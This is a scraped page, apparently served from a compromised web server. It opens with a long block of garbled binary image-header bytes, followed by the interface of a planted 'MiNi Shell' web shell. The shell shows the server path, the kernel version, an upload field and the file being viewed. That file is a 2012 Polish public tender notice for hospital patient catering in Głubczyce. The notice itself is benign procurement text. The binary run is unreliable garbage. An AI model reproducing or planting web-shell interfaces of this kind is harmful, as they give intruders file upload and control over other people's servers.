JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121122/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121122/465062-N-2012.html

<p class="kh_header"><b>Głubczyce: Świadczenie usługi całodobowego wyżywienia pacjentów na rzecz SP ZOZ 
w Głubczycach PN / 19  / XI  / 12</b><br>
<b>Numer ogłoszenia: 465062 - 2012; data zamieszczenia: 22.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej w Głubczycach , ul. M. Skłodowskiej-Curie 26, 48-100 Głubczyce, woj. opolskie, tel. 077 4801170, faks 077 4801171.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozglubczyce.biuletyn.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi całodobowego wyżywienia pacjentów na rzecz SP ZOZ 
w Głubczycach PN / 19  / XI  / 12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:
1) Świadczenie usługi całodobowego wyżywienia pacjentów na rzecz SP ZOZ w Głubczyce oraz ZOL w Kietrzu.
2) Sporządzenie posiłków zgodnie z zamówioną ilością diet.
3) Dostawa posiłków w ściśle określonych godzinach do pomieszczenia dystrybucji posiłków.
4) Średnia ilość posiłków wydawanych na dobę - 181
Średni miesięczny zestaw diet: 
    a) podstawowa - 2850; 
    b) cukrzycowa - 870;
    c) wątrobowo - wrzodowa - 720; 
    d) małego dziecka - 60;
    e) miksowane, sonda, papka - 180;
    f) lekkostrawna - 420;
    g) trzustkowa -  60;
    h) kleikowa - 20;
    i) wysokobiałkowa - 30;
    j) inne (niskokaloryczna 30, ubogoresztkowa 60, nerkowa 120, bogatoresztkowa 30)  - 240.
5) Kaloryczność  wyżywienia całodobowego musi być zgodna z normami Instytutu Żywienia.
6) Ilość i rodzaj diet wydawanych w poszczególnych kuchenkach oddziałowych na dobę wg załączonej tabeli do niniejszego SIWZ zał. nr 6
7) Rodzaj, ilość diet oraz dodatków uzależniona jest od stanów chorobowych pacjentów przebywających w szpitalu i ulega zmianom w dniach przyjęć i wypisów.
8) Pacjenci z dietą cukrzycową otrzymują dodatek cukrzycowy 2 x dziennie 
    - II śniadanie  wymienniki węglowodanowe - 2,5 ( 2 - pieczywo produkty zbożowe, 0,5 - owoce), wymienniki       białkowe 0,5, wymienniki tłuszczowe - 1,
    - Podwieczorek wymienniki węglowodanowe - 3,5 ( 2 - pieczywo produkty zbożowe, 1 - owoce, 0,5 - produkty mleczne),  wymienniki tłuszczowe - 1
9) Pacjenci z dietą wysokobiałkową (sonda, płynna gęsta) - dodatek wysokobiałkowy otrzymują 2 x dziennie.
10) Wykonawca będzie przygotowywać jadłospisy oraz posiłki dla wszystkich pacjentów hospitalizowanych przez okres trwania umowy z uwzględnieniem zalecanych diet. W jadłospisie należy uwzględnić przygotowanie posiłków tradycyjnych w okresie świątecznym. Jadłospis powinien zawierać gramaturę i kaloryczność wszystkich proponowanych posiłków.
11) Artykuły spożywcze i inne produkty/surowce niezbędne do przygotowania posiłków wykonawca kupuje na własny koszt.
12) Wykonawca zapewnia dostawę przygotowanych posiłków na poszczególne oddziały szpitalne mieszczące się w budynkach przy ul. Marii Skłodowskiej-Curie 26 (6 oddziałów), oraz ul. Ks. Biskupa Konrada 1 w Kietrzu (1 oddział ZOL). Odległość z Głubczyc do Kietrza w jedną stronę wynosi około 23 km.      
13) Godziny dostarczania posiłków oraz ilość posiłków na dobę zostanie uzgodniona z wybranym Wykonawcą. 
14) Harmonogram wydawania posiłków oraz jego zmiany zatwierdza dietetyk szpitalny wyznaczony przez Zamawiającego. Harmonogram ten musi być dostosowany do pracy poszczególnych oddziałów szpitalnych.  

          Harmonogram dostaw posiłków:
 
Lp.	Rodzaj posiłku	Godzina dostawy
1.	Śniadanie	8.00
2.	Drugie śniadanie	10.00 (pacjenci chorzy na cukrzycę, od. dziecięcy oraz ZOL Kietrz i Głubczyce)
3.	Obiad	12.00 - 13.00
4.	Podwieczorek	16.00 (pacjenci chorzy na cukrzycę, od. dziecięcy oraz ZOL Kietrz i Głubczyce)
5.	Kolacja	17.00 - 18.00


15) Wykonawca będzie podlegał kontroli dietetyka szpitalnego, zespołu ds. zakażeń oraz pełnomocnika ds. SZJ.  
Wszelkie ustalenia pokontrolne Wykonawca zobowiązany jest usunąć w trybie przewidzianym w protokole / audycie pokontrolnym. 
16) Zamawianie posiłków odbywać się będzie na podstawie pisemnych zamówień wystawianych przez Zamawiającego, gdzie podany będzie rodzaj posiłku, liczba pacjentów i rodzaj diet. Zalecania będą składane Wykonawcy do godz. 6.30 dnia, w którym obowiązuje dostawa. W pojedynczych przypadkach (w sytuacji podyktowanej stanem chorobowym pacjenta) zamawiający zastrzega sobie prawo zmiany zamówienia do godz. 11.00 dnia, w którym obowiązuje dostawa.
17) Wykonawca zobowiązany będzie do przedstawienia Zamawiającemu jadłospisu obowiązującego przez 10 kolejnych dni- najpóźniej na 3 dni robocze przed terminem obowiązywania jadłospisu. 
18) Obowiązek porcjowania posiłków i dostarczania ich do pacjentów spoczywa na pracownikach Zamawiającego (Salowej przy współudziale pielęgniarki).
19) Wykonawca w ramach zamówienia jest zobowiązany do dostarczania produktów do kuchni mlecznych i na oddziały zamawiającego:
   - mleka w proszku dla niemowląt (B-1 - 10 op., B-2 - 23 op., Nan 1 - 5 op., Nan 2 - 5 op., Babilon 1 - 4 op., Babilon 2 - 5 op., Bebiko 3 - 2 op. - ilości roczne)
   - mleka krowiego (300 L/ miesiąc)
   - sucharów (32 szt./miesiąc)
   - kasza manna (grysik) (5 kg/rok)
   - kleik ryżowy (320 szt./ rok)
   - chleb (120 szt./miesięcznie)
   - dżem [250 ml] (dla pacjentów ZOL Głubczyce i Kietrz) - (16 szt./miesięcznie)
   - margaryna do smarowania [0,5 kg] (8 szt./miesięcznie)
   - herbata (56 op./miesięcznie)
   - cukier (104 kg/miesięcznie)
20) Do posiłków: śniadanie - należy przewidzieć kawę mleczną, zupę mleczną, obiad - kompot, kisiel płynny itp., kolacja - należy planować herbatę wraz z cukrem.
21) Wykonawca jest zobowiązany do dostarczania drugiego śniadania i podwieczorku dla pacjentów chorych na cukrzyce, oddziału dziecięcego oraz ZOL Głubczyce i Kietrz, zgodnie harmonogramem pkt 14).
22) Zestawy posiłków dla pacjentów ZOL Kietrz i Głubczyce muszą zawierać zróżnicowane menu, posiłki nie mogą się powtarzać w jednej dekadówce (10 dniowy jadłospis).

Obowiązki i uprawnienia Wykonawcy:
1) Wykonawca zobowiązuje się realizować przedmiot zamówienia zgodnie z wymogami określonymi w ustawie z dn. 25.08.2006r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010r. nr. 136 poz. 914 z późn. zm.), w przepisach wykonawczych do tej ustawy, innych powszechnie obowiązujących przepisach prawa dotyczących przygotowania i dostarczania posiłków dla pacjentów przebywających w szpitalu, jak również zgodnie z obowiązującymi przepisami SP ZOZ w zakresie bhp, p-poż. i Sanepid-u 
W przypadku  zmian powyższych przepisów Wykonawca jest zobowiązany do dostosowania przygotowania, gotowania i dostarczania posiłków bez dodatkowych opłat ze strony Zamawiającego.
2) Wykonawca ponosi pełną odpowiedzialność prawną i finansową za realizację przedmiotu zamówienia wobec Zamawiającego oraz organów kontroli (PIP, Sanepid itp.).
3) Wykonawca przejmuje pełną odpowiedzialność za jakość i czystość oferowanych posiłków.
4) Wykonawca odpowiada za dobór właściwych produktów/surowców zgodnie ze zróżnicowanymi dietami żywieniowymi pacjentów.
5) Wykonawca odpowiada za higienę osobistą i stan zdrowotny zatrudnionego personelu.
6) Wykonawca odpowiada za dobór właściwych procesów technologicznych, gwarantując najwyższą jakość oferowanych posiłków.
7) Wykonawca wyznaczy osoby, które odpowiadają za zaopatrzenie  szpitala i oddziałów w żywność, bezpieczne przechowywanie produktów/surowców oraz dystrybucję posiłków na oddziały szpitalne.
8) Wykonawca zobowiązuje się do zapewnienia, aby posiłki i produkty/surowce były przechowywane we właściwej temperaturze i dystrybuowane w bezpieczny sposób.
9) W gestii Wykonawcy leży zabezpieczenie odpowiedniej ilości termosów, wózków bemarowych i pojemników, zabezpieczających posiłki przed wylaniem / schłodzeniem, oraz spełniających wymogi sanitarno-epidemiologiczne.
10) Wykonawca zapewnia termometr do pomiaru temperatury dostarczonych posiłków.
11) Wykonawca na każde żądanie Zamawiającego udostępni dokumentację potwierdzającą mycie i dezynfekcję środka transportu (samochodu dostawczego oraz termosów/pojemników do przewozu żywności).
12) Wykonawca wyznaczy osoby, które odpowiadają za zaopatrzenie szpitala w żywność, bezpieczne przechowywanie produktów spożywczych w depozycie.
13) Wykonawca zobowiązuje się do bezpiecznego i właściwego usuwania resztek niespożytych posiłków. Pojemniki / worki do przechowywania resztek pokonsumpcyjnych winny być dostarczane na oddziały szpitalne przez Wykonawcę oraz odbierane przez niego, myte i dezynfekowane w kuchni wykonawcy. 
14) Wykonawca odbiera naczynia/pojemniki transportowe z poszczególnych oddziałów szpitalnych. Ich mycie  powinno odbywać się w kuchni wykonawcy. W przypadku uszkodzenia, zniszczenia itp. naczyń/pojemników transportowych Wykonawca niezwłocznie je wymieni na własny koszt.   
15) Pracownicy wykonujący przedmiot zamówienia powinni posiadać odzież ochronną, nakrycie głowy, odpowiednie obuwie i środki ochrony indywidualnej, które zapewnia Wykonawca. Pracownicy ci powinni również posiadać aktualne książeczki zdrowia z pełnymi badaniami wymaganymi w placówkach.
16) Wszystkie posiłki będą wykonywane na bazie kuchni wykonawcy
17) Wykonawca na własny koszt zobowiązuje się do wykonywania badań na czystość mikrobiologiczną powierzchni, sprzętów oraz rąk personelu co 6 miesięcy oraz każdorazowo w razie zatruć i zakażeń pokarmowych przez właściwą stację sanitarno-epidemiologiczną i każdorazowe dostarczenie Zamawiającemu wyników tych badań.
18) Wykonawca ponosi pełną odpowiedzialność prawną i finansową za realizację przedmiotu zamówienia wobec Zamawiającego oraz organów kontroli (PIP, Sanepid itp.) oraz zobowiązuje się do przekazywania wszystkich wyników nadzoru sanitarnego, PIP i innych służb, niezwłocznie po ich otrzymaniu.
19)  Wykonawca musi posiadać wdrożony system HACCP.
20) Wszelkie zastrzeżenia z oddziałów szpitalnych Zamawiającego zostaną przekazane osobie wyznaczonej przez Wykonawcę. Wykonawca po rozpoznaniu nieprawidłowości winien natychmiast usunąć wszelkie stwierdzone usterki w wykonywaniu usługi. 
21) Wykonawca zobowiązany jest do przechowywania próbek pokarmowych  ze wszystkich wykonanych i dostarczonych posiłków każdego dnia przez okres 72 godzin z oznaczeniem daty, godziny, zawartości próbki pokarmowej z podpisem osoby odpowiedzialnej za pobieranie tych próbek.
22) Wykonawca zobowiązany jest do dostarczenie przed podpisaniem umowy:
a) Decyzji dla kuchni w której Wykonawca będzie wykonywał posiłki wydaną przez właściwego Państwowego Powiatowego Inspektora Sanitarnego na produkcje posiłków i wywóz posiłków,
b) Decyzje właściwego Państwowego Powiatowego Inspektora Sanitarnego na dwa środki transportu, którymi będą dostarczane posiłki do Zamawiającego.
23) Wykonawca zobowiązany jest na każde życzenie Zamawiającego przekazać protokoły z kontroli sanepidu.

Obowiązki i uprawnienia Zamawiającego:
1) Wykonawca będzie podlegał kontroli pracowników Zamawiającego: dietetyka szpitalnego, zespołu ds. zakażeń oraz  pełnomocnika ds. Systemu Zarządzania Jakością. Zamawiający wyznaczy powyższych pracowników, a Wykonawca 2 osoby, które stanowić będą Komisję oceniającą jakość wykonywanych usług.
Wszelkie przypadki nienależytego wykonywania usługi będą odnotowywane w protokole/audycie pokontrolnym, a ustalenia pokontrolne Wykonawca zobowiązany będzie usunąć w trybie przewidzianym w protokole/audycie pokontrolnym. W przypadku trzykrotnego stwierdzenia przez Zamawiającego nienależytego wykonywania usługi jest on uprawniony do nałożenia kary umownej.  
2) Wymienieni w pkt. 1)  pracownicy Zamawiającego będą sprawować nadzór nad jakością, ilością, przestrzeganiem norm dziennych racji pokarmowych, stosowanych surowców, przebiegu procesów technologicznych, jak i czystości pomieszczeń i sprzętu. 
3) Zamawiający będzie informował Wykonawcę o przeprowadzanych ankietach w zakresie badania zadowolenia pacjentów/klientów. Wnioski z powyższych badań Zamawiający przedstawi Wykonawcy w celu wdrożenia, usprawnienia itp. świadczonych usług w określonym czasie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.00.00-1, 55.52.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił żadnego szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełnia warunek, jeżeli w przedstawionych do oferty dokumentach wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub wykonywał przez minimum 12 miesięcy, jedno zamówienie, polegające na świadczeniu usługi żywienia w szpitalach, klinikach lub instytucjach o tożsamym charakterze działalności o wartości nie mniejszej niż 500.000,00 zł (pięćset tysięcy zł) brutto, oraz udokumentuje, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie postawił żadnego szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie postawił żadnego szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek, jeżeli wykaże się ubezpieczeniem od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, w tym żywienia i rozszerzeniem o ryzyko zatruć pokarmowych ważnym na dzień składania ofert, na kwotę nie niższą niż  500.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Oświadczenie Wykonawcy, że w procesie produkcji lub / i obrocie artykułami żywnościowymi jest wdrożony i stosowany system HACCP.  Zamawiający zastrzega sobie prawo do weryfikacji treści oświadczenia poprzez żądanie dokumentów potwierdzających jego treść po zawarciu umowy.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowo-cenowy (zał.1 do SIWZ), 2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile fakt ten nie wynika z przedstawionych dokumentów rejestrowych. Udowodnienie posiadania uprawnień do podpisania oferty ciąży na Wykonawcy. 3)oświadczenia o
braku podstaw do wykluczenia - załącznik nr 3 do SIWZ 4) w stosunku do osób fizycznych - oświadczenie w zakresie art. 24 ust. 1 pkt 2 Pzp podpisane przez każdą osobę prowadzącą działalność gospodarczą - wg załącznika nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
